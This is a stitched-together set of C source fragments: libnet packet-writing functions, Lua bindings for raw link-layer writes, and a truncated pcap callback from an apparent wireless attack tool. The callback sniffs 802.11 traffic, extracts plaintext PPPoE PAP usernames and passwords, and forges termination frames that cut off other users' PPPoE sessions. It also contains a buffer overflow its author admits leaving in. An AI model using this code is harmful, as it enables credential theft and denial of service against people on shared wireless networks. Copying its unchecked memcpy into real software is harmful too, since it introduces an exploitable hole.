int
libnet_adv_write_link(libnet_t *l, const uint8_t *packet, uint32_t packet_s)
{
int c;
if (l->injection_type != LIBNET_LINK_ADV)
{
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): advanced link mode not enabled\n", __func__);
return (-1);
}
c = libnet_write_link(l, packet, packet_s);
/* do statistics */
if (c == packet_s)
{
l->stats.packets_sent++;
l->stats.bytes_written += c;
}
else
{
l->stats.packet_errors++;
/*
* XXX - we probably should have a way to retrieve the number of
* bytes actually written (since we might have written something).
*/
if (c > 0)
{
l->stats.bytes_written += c;
}
}
return (c);
}
static int lnet_link (lua_State *L)
{
libnet_t** ud = luaL_checkudata(L, 1, L_NET_REGID);
luaL_argcheck(L, *ud, 1, "net has been destroyed");
size_t payloadsz = 0;
const char* payload = luaL_checklstring(L, 2, &payloadsz);
int size = libnet_write_link(*ud, (uint8_t*)payload, payloadsz);
lua_pushinteger(L, size);
return 1;
}
/*-
-- size = net:write_link(link_pdu)
Writes link_pdu raw at the link layer, you are responsible for forming
the link-layer header.
Returns the size written on success.
*/
static int lnet_write_link (lua_State *L)
{
libnet_t* ud = checkudata(L);
size_t payloadsz_ = 0;
const char* payload_ = luaL_checklstring(L, 2, &payloadsz_);
uint32_t payloadsz = (uint32_t) payloadsz_;
const uint8_t* payload = (const uint8_t*) payload_;
int size = libnet_write_link(ud, payload, payloadsz);
check_error(L, ud, size);
lua_pushinteger(L, size);
return 1;
}
int
libnet_write(libnet_t *l)
{
int c;
uint32_t len;
uint8_t *packet = NULL;
if (l == NULL)
{
return (-1);
}
c = libnet_pblock_coalesce(l, &packet, &len);
if (c == - 1)
{
/* err msg set in libnet_pblock_coalesce() */
return (-1);
}
/* assume error */
c = -1;
switch (l->injection_type)
{
case LIBNET_RAW4:
case LIBNET_RAW4_ADV:
if (len > LIBNET_MAX_PACKET)
{
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): packet is too large (%d bytes)\n",
__func__, len);
goto done;
}
c = libnet_write_raw_ipv4(l, packet, len);
break;
case LIBNET_RAW6:
case LIBNET_RAW6_ADV:
c = libnet_write_raw_ipv6(l, packet, len);
break;
case LIBNET_LINK:
case LIBNET_LINK_ADV:
c = libnet_write_link(l, packet, len);
break;
default:
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): unsuported injection type\n", __func__);
goto done;
}
/* do statistics */
if (c == len)
{
l->stats.packets_sent++;
l->stats.bytes_written += c;
}
else
{
l->stats.packet_errors++;
/*
* XXX - we probably should have a way to retrieve the number of
* bytes actually written (since we might have written something).
*/
if (c > 0)
{
l->stats.bytes_written += c;
}
}
done:
/*
* Restore original pointer address so free won't complain about a
* modified chunk pointer.
*/
if (l->aligner > 0)
{
packet = packet - l->aligner;
}
free(packet);
return (c);
}
void pcap_callback(u_char *user, const struct pcap_pkthdr *h, const u_char *bytes)
{
u_char *p;
struct ieee80211_frame *pieee; //awesome name ^_^
struct pppoe_session *ppppoe; //awesome name too o_o
p = (u_char *)bytes;
p += ((struct ieee80211_radiotap_header*)p)->it_len; //skip radiotap header
pieee = (struct ieee80211_frame*)p;
if(!(((pieee->i_fc >> 2) & 0b11) == 2)) { //Is it Data frame?
//printf("Data %d", (pieee->i_fc >> 2) & 0b11);
return;
}
{
int t;
t = pieee->i_fc>>8 & 0b11;
if(t == 0 || t == 3) { // IBSS or DS -> DS frame
return;
}
}
p += sizeof(struct ieee80211_frame);// skip ieee80211_frame header
//if(((pieee->i_fc >> 4) & 0b1111) == 8) { //What?! QoS Frame?
// p += 2; // The additional qos field, nasty hack though.
//}
if(0x8864 == ntohs(*(uint16_t*)(&p[6]))) { //The type field in LLC header, is it PPPoE Session?
// Got one
p += 8; //sizeof LLC header
ppppoe = (struct pppoe_session *)p;
p += sizeof(struct pppoe_session);
if(0xc023 == ntohs(*(uint16_t*)p) && // Password Authentication Protocol
p[2] == 0x01) { //Code == Authenticate-Request, GOT IT!
/* PPP PAP {
* Code: 1 byte
* Identifier: 1 byte
* Length: 2 byte, BIG ENDIAN
* Data: {
* len_username: 1 byte
* username: len_username bytes
* len_password: 1 byte
* password: len_password bytes
* }
* }
*/
int len;
char buf[100]; //YES this is a *BUFFER OVERFLOW* vulnerability, I aware of it.
p += 6; // points to len_username
len = *p;
memcpy(buf, p+1, len);
buf[len] = 0;
printf("\nWe got an account: %s/", buf);
p += len+1;
len = *p;
memcpy(buf, p+1, len);
buf[len] = 0;
printf("%s Session ID: 0x%04X\n", buf, ntohs(ppppoe->session_id));
return;
} else if(0xc021 == ntohs(*(uint16_t*)p) && // Link Control Protocol
p[2] == 0x06) { //Code == Termination Ack
printf("\nPPP Link 0x%04lX is down.\n", (u_long)ntohs(ppppoe->session_id));
} else { // ordinary data frames
u_short sessid;
sessid = ntohs(ppppoe->session_id);
pktcount[sessid]++;
if(verbose)
write(STDOUT_FILENO, ".", 1); //printf buffers your input, &*%^&#$%^@
if(pktcount[sessid] > 30) {
//TIME TO TEAR IT DOWN!!!!
u_char buf[200];
memset(buf, 0, sizeof buf);
p = buf;
memcpy(p, u8aRadiotap, sizeof u8aRadiotap); //radiotap header
p[8] = 11; //rate, 5.5M
p += sizeof(u8aRadiotap);
//IEEE802.11 frame
# define P ((struct ieee80211_frame *)p)
# ifdef QOS_FRAME
P->i_fc = 0x188; // QoS Data frame, STA -> DS
# else
P->i_fc = 0x108; // Data frame, STA -> DS
# endif
switch(((pieee->i_fc)>>8) & 0b11) { // ToDS && FromDS flag
case 1: // STA -> DS
/*
memcpy(P->i_addr1, pieee->i_addr1, 6); // BSSID
memcpy(P->i_addr2, pieee->i_addr2, 6); // Source
memcpy(P->i_addr3, pieee->i_addr3, 6); // Destination
*/
memcpy(P->i_addr1, pieee->i_addr1, 6*3); // all things
break;
case 2: // DS -> STA
memcpy(P->i_addr1, pieee->i_addr2, 6); // BSSID
memcpy(P->i_addr2, pieee->i_addr1, 6); // Source
memcpy(P->i_addr3, pieee->i_addr3, 6); // Destination
break;
default:
{
pcap_dumper_t *pd;
printf("\nHoly shit, what is it?!\n");
pd = pcap_dump_open(pcap_context, "/dev/shm/whatdamnpacket");
pcap_dump((u_char*)pd, h, bytes);
pcap_dump_close(pd);
pcap_breakloop(pcap_context);
return;
}
break;
}
P->i_dur = 127; // Duration, from wireshark, in microseconds
P->i_seq = ((pieee->i_seq >> 4) + 5) << 4; // Sequence number
p += sizeof(struct ieee80211_frame);
# undef P
//Logical Link Control
memcpy(p, llcData, sizeof llcData);
p+=sizeof llcData;
//PPPoE Termination Request
memcpy(p, pppoeTerminate, sizeof pppoeTerminate);
((struct pppoe_session *)p)->session_id = ppppoe->session_id; //Session ID
p[9] = 1; //Identifier
p += sizeof pppoeTerminate;
libnet_write_link(libnet_context, buf, p - buf); // Send the packet!
//printf("%08lX, %08lX, %08lX, %ld\n", libnet_context, buf, p, p - buf);
printf("\nSent PPP Termination Request for Session 0x%04lX\n", (u_long)sessid);
pktcount[sessid] = 0;
}
}
